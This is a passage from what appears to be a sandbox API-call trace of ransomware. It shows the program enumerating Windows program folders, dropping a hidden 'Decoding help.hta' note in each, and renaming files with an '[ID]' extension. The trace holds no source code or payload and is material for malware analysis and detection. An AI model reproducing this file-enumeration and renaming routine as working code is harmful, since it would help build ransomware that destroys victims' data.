(x86)\\Windows Defender\\en-US\\Decoding help.hta" [0041.317] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Defender\\en-US\\Decoding help.hta" (normalized: "c:\\program files (x86)\\windows defender\\en-us\\decoding help.hta")) returned 0x1 [0041.317] lstrcmpiW (lpString1="Decoding help.hta", lpString2="MpEvMsg.dll.mui") returned -1 [0041.317] lstrlenW (lpString="MpEvMsg.dll.mui") returned 15 [0041.317] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Defender\\en-US\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Defender\\en-US\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Defender\\en-US\\*.*" [0041.317] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Defender\\en-US\\*.*") returned 53 [0041.317] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Defender\\en-US\\", lpString2="MpEvMsg.dll.mui" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Defender\\en-US\\MpEvMsg.dll.mui") returned="\\\\?\\C:\\Program Files (x86)\\Windows Defender\\en-US\\MpEvMsg.dll.mui" [0041.317] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Defender\\en-US\\MpEvMsg.dll.mui" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Defender\\en-US\\MpEvMsg.dll.mui") returned="\\\\?\\C:\\Program Files (x86)\\Windows Defender\\en-US\\MpEvMsg.dll.mui" [0041.317] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Defender\\en-US\\MpEvMsg.dll.mui", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Defender\\en-US\\MpEvMsg.dll.mui.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Windows Defender\\en-US\\MpEvMsg.dll.mui.[ID]g9uZrLhJaygpwRm1[ID]" [0041.317] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Windows Defender\\en-US\\MpEvMsg.dll.mui" (normalized: "c:\\program files (x86)\\windows defender\\en-us\\mpevmsg.dll.mui"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Windows Defender\\en-US\\MpEvMsg.dll.mui.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\windows defender\\en-us\\mpevmsg.dll.mui.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0041.317] FindNextFileW (in: hFindFile=0x5d8210, lpFindFileData=0x1391fd30 | out: lpFindFileData=0x1391fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdcf9a66, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0xe067905, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0xdcf9a66, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x0, dwReserved1=0x0, cFileName="MpEvMsg.dll.mui", cAlternateFileName="")) returned 0 [0041.317] FindClose (in: hFindFile=0x5d8210 | out: hFindFile=0x5d8210) returned 1 Thread: id = 271 os_tid = 0x968 [0040.891] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Mail\\en-US\\*.*", lpFindFileData=0xa78fd30 | out: lpFindFileData=0xa78fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1ea6723d, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x229eba17, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1ea6723d, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5d8250 [0040.891] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0040.891] FindNextFileW (in: hFindFile=0x5d8250, lpFindFileData=0xa78fd30 | out: lpFindFileData=0xa78fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1ea6723d, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x229eba17, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1ea6723d, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0041.314] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0041.314] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0041.314] FindNextFileW (in: hFindFile=0x5d8250, lpFindFileData=0xa78fd30 | out: lpFindFileData=0xa78fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe506d6c, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0xe874c0b, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0xe506d6c, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x7e800, dwReserved0=0x0, dwReserved1=0x0, cFileName="msoeres.dll.mui", cAlternateFileName="")) returned 1 [0041.314] lstrcpyW (in: lpString1=0x42c4878, lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Mail\\en-US\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Mail\\en-US\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Mail\\en-US\\*.*" [0041.314] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Mail\\en-US\\*.*") returned 49 [0041.314] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Mail\\en-US\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Mail\\en-US\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Windows Mail\\en-US\\Decoding help.hta" [0041.314] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Mail\\en-US\\Decoding help.hta" (normalized: "c:\\program files (x86)\\windows mail\\en-us\\decoding help.hta")) returned 0xffffffff [0041.314] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Mail\\en-US\\Decoding help.hta" (normalized: "c:\\program files (x86)\\windows mail\\en-us\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x340 [0041.321] WriteFile (in: hFile=0x340, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0xa78fcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0xa78fcf8*=0x78e, lpOverlapped=0x0) returned 1 [0041.322] CloseHandle (hObject=0x340) returned 1 [0041.322] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Mail\\en-US\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0041.322] lstrcmpiW (lpString1="Decoding help.hta", lpString2="msoeres.dll.mui") returned -1 [0041.322] lstrlenW (lpString="msoeres.dll.mui") returned 15 [0041.322] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Mail\\en-US\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Mail\\en-US\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Mail\\en-US\\*.*" [0041.322] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Mail\\en-US\\*.*") returned 49 [0041.322] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Mail\\en-US\\", lpString2="msoeres.dll.mui" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Mail\\en-US\\msoeres.dll.mui") returned="\\\\?\\C:\\Program Files (x86)\\Windows Mail\\en-US\\msoeres.dll.mui" [0041.322] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Mail\\en-US\\msoeres.dll.mui" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Mail\\en-US\\msoeres.dll.mui") returned="\\\\?\\C:\\Program Files (x86)\\Windows Mail\\en-US\\msoeres.dll.mui" [0041.322] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Mail\\en-US\\msoeres.dll.mui", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Mail\\en-US\\msoeres.dll.mui.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Windows Mail\\en-US\\msoeres.dll.mui.[ID]g9uZrLhJaygpwRm1[ID]" [0041.322] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Windows Mail\\en-US\\msoeres.dll.mui" (normalized: "c:\\program files (x86)\\windows mail\\en-us\\msoeres.dll.mui"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Windows Mail\\en-US\\msoeres.dll.mui.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\windows mail\\en-us\\msoeres.dll.mui.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0041.322] FindNextFileW (in: hFindFile=0x5d8250, lpFindFileData=0xa78fd30 | out: lpFindFileData=0xa78fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdd1fd1f, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0xe067905, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0xdd1fd1f, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x1600, dwReserved0=0x0, dwReserved1=0x0, cFileName="WinMail.exe.mui", cAlternateFileName="")) returned 1 [0041.323] lstrcpyW (in: lpString1=0x42c4878, lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Mail\\en-US\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Mail\\en-US\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Mail\\en-US\\*.*" [0041.323] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Mail\\en-US\\*.*") returned 49 [0041.323] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Mail\\en-US\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Mail\\en-US\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Windows Mail\\en-US\\Decoding help.hta" [0041.323] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Mail\\en-US\\Decoding help.hta" (normalized: "c:\\program files (x86)\\windows mail\\en-us\\decoding help.hta")) returned 0x1 [0041.323] lstrcmpiW (lpString1="Decoding help.hta", lpString2="WinMail.exe.mui") returned -1 [0041.323] lstrlenW (lpString="WinMail.exe.mui") returned 15 [0041.323] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Mail\\en-US\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Mail\\en-US\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Mail\\en-US\\*.*" [0041.323] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Mail\\en-US\\*.*") returned 49 [0041.323] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Mail\\en-US\\", lpString2="WinMail.exe.mui" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Mail\\en-US\\WinMail.exe.mui") returned="\\\\?\\C:\\Program Files (x86)\\Windows Mail\\en-US\\WinMail.exe.mui" [0041.323] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Mail\\en-US\\WinMail.exe.mui" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Mail\\en-US\\WinMail.exe.mui") returned="\\\\?\\C:\\Program Files (x86)\\Windows Mail\\en-US\\WinMail.exe.mui" [0041.323] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Mail\\en-US\\WinMail.exe.mui", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Mail\\en-US\\WinMail.exe.mui.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Windows Mail\\en-US\\WinMail.exe.mui.[ID]g9uZrLhJaygpwRm1[ID]" [0041.323] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Windows Mail\\en-US\\WinMail.exe.mui" (normalized: "c:\\program files (x86)\\windows mail\\en-us\\winmail.exe.mui"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Windows Mail\\en-US\\WinMail.exe.mui.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\windows mail\\en-us\\winmail.exe.mui.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0041.323] FindNextFileW (in: hFindFile=0x5d8250, lpFindFileData=0xa78fd30 | out: lpFindFileData=0xa78fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdd1fd1f, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0xe067905, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0xdd1fd1f, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x1600, dwReserved0=0x0, dwReserved1=0x0, cFileName="WinMail.exe.mui", cAlternateFileName="")) returned 0 [0041.323] FindClose (in: hFindFile=0x5d8250 | out: hFindFile=0x5d8250) returned 1 Thread: id = 272 os_tid = 0x958 [0040.891] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\en-US\\*.*", lpFindFileData=0x8b8fd30 | out: lpFindFileData=0x8b8fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1eab37af, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x229eba17, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1eab37af, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5d84d0 [0040.901] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0040.901] FindNextFileW (in: hFindFile=0x5d84d0, lpFindFileData=0x8b8fd30 | out: lpFindFileData=0x8b8fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1eab37af, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x229eba17, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1eab37af, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0041.375] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0041.375] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0041.375] FindNextFileW (in: hFindFile=0x5d84d0, lpFindFileData=0x8b8fd30 | out: lpFindFileData=0x8b8fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1193665a, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x11c7e240, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1193665a, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x800, dwReserved0=0x0, dwReserved1=0x0, cFileName="sbdrop.dll.mui", cAlternateFileName="")) returned 1 [0041.375] lstrcpyW (in: lpString1=0x11173c18, lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\en-US\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\en-US\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\en-US\\*.*" [0041.375] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\en-US\\*.*") returned 52 [0041.375] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\en-US\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\en-US\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\en-US\\Decoding help.hta" [0041.375] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\en-US\\Decoding help.hta" (normalized: "c:\\program files (x86)\\windows sidebar\\en-us\\decoding help.hta")) returned 0xffffffff [0041.375] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\en-US\\Decoding help.hta" (normalized: "c:\\program files (x86)\\windows sidebar\\en-us\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x370 [0041.375] WriteFile (in: hFile=0x370, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x8b8fcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0x8b8fcf8*=0x78e, lpOverlapped=0x0) returned 1 [0041.376] CloseHandle (hObject=0x370) returned 1 [0041.376] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\en-US\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0041.376] lstrcmpiW (lpString1="Decoding help.hta", lpString2="sbdrop.dll.mui") returned -1 [0041.377] lstrlenW (lpString="sbdrop.dll.mui") returned 14 [0041.377] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\en-US\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\en-US\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\en-US\\*.*" [0041.377] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\en-US\\*.*") returned 52 [0041.377] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\en-US\\", lpString2="sbdrop.dll.mui" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\en-US\\sbdrop.dll.mui") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\en-US\\sbdrop.dll.mui" [0041.377] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\en-US\\sbdrop.dll.mui" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\en-US\\sbdrop.dll.mui") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\en-US\\sbdrop.dll.mui" [0041.377] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\en-US\\sbdrop.dll.mui", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\en-US\\sbdrop.dll.mui.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\en-US\\sbdrop.dll.mui.[ID]g9uZrLhJaygpwRm1[ID]" [0041.377] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\en-US\\sbdrop.dll.mui" (normalized: "c:\\program files (x86)\\windows sidebar\\en-us\\sbdrop.dll.mui"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\en-US\\sbdrop.dll.mui.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\windows sidebar\\en-us\\sbdrop.dll.mui.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0041.377] FindNextFileW (in: hFindFile=0x5d84d0, lpFindFileData=0x8b8fd30 | out: lpFindFileData=0x8b8fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1193665a, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x11c7e240, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1193665a, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x4a00, dwReserved0=0x0, dwReserved1=0x0, cFileName="Sidebar.exe.mui", cAlternateFileName="")) returned 1 [0041.377] lstrcpyW (in: lpString1=0x11173c18, lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\en-US\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\en-US\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\en-US\\*.*" [0041.377] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\en-US\\*.*") returned 52 [0041.377] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\en-US\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\en-US\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\en-US\\Decoding help.hta" [0041.377] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\en-US\\Decoding help.hta" (normalized: "c:\\program files (x86)\\windows sidebar\\en-us\\decoding help.hta")) returned 0x1 [0041.377] lstrcmpiW (lpString1="Decoding help.hta", lpString2="Sidebar.exe.mui") returned -1 [0041.377] lstrlenW (lpString="Sidebar.exe.mui") returned 15 [0041.377] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\en-US\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\en-US\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\en-US\\*.*" [0041.377] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\en-US\\*.*") returned 52 [0041.377] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\en-US\\", lpString2="Sidebar.exe.mui" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\en-US\\Sidebar.exe.mui") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\en-US\\Sidebar.exe.mui" [0041.377] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\en-US\\Sidebar.exe.mui" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\en-US\\Sidebar.exe.mui") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\en-US\\Sidebar.exe.mui" [0041.377] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\en-US\\Sidebar.exe.mui", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\en-US\\Sidebar.exe.mui.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\en-US\\Sidebar.exe.mui.[ID]g9uZrLhJaygpwRm1[ID]" [0041.377] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\en-US\\Sidebar.exe.mui" (normalized: "c:\\program files (x86)\\windows sidebar\\en-us\\sidebar.exe.mui"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\en-US\\Sidebar.exe.mui.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\windows sidebar\\en-us\\sidebar.exe.mui.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0041.377] FindNextFileW (in: hFindFile=0x5d84d0, lpFindFileData=0x8b8fd30 | out: lpFindFileData=0x8b8fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1193665a, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x11c7e240, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1193665a, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x4a00, dwReserved0=0x0, dwReserved1=0x0, cFileName="Sidebar.exe.mui", cAlternateFileName="")) returned 0 [0041.378] FindClose (in: hFindFile=0x5d84d0 | out: hFindFile=0x5d84d0) returned 1 Thread: id = 273 os_tid = 0x63c [0040.892] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\*.*", lpFindFileData=0xa00fd30 | out: lpFindFileData=0xa00fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8012b5d2, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x8012b5d2, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x8012b5d2, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5d8450 [0040.901] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0040.901] FindNextFileW (in: hFindFile=0x5d8450, lpFindFileData=0xa00fd30 | out: lpFindFileData=0xa00fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8012b5d2, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x8012b5d2, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x8012b5d2, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0041.360] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0041.360] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0041.360] FindNextFileW (in: hFindFile=0x5d8450, lpFindFileData=0xa00fd30 | out: lpFindFileData=0xa00fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8012b5d2, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x1ea8d4f6, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1ea8d4f6, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Calendar.Gadget", cAlternateFileName="CALEND~1.GAD")) returned 1 [0041.360] lstrcmpW (lpString1=".", lpString2="Calendar.Gadget") returned -1 [0041.360] lstrcmpW (lpString1="..", lpString2="Calendar.Gadget") returned -1 [0041.360] lstrcmpiW (lpString1="windows", lpString2="Calendar.Gadget") returned 1 [0041.360] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\*.*" [0041.360] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\*.*") returned 54 [0041.360] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\", lpString2="Calendar.Gadget" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget" [0041.360] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\*.*" [0041.360] GlobalMemoryStatus (in: lpBuffer=0xa00fd10 | out: lpBuffer=0xa00fd10) [0041.361] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x5f60fb8, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x2f0 [0041.361] CloseHandle (hObject=0x2f0) returned 1 [0041.361] FindNextFileW (in: hFindFile=0x5d8450, lpFindFileData=0xa00fd30 | out: 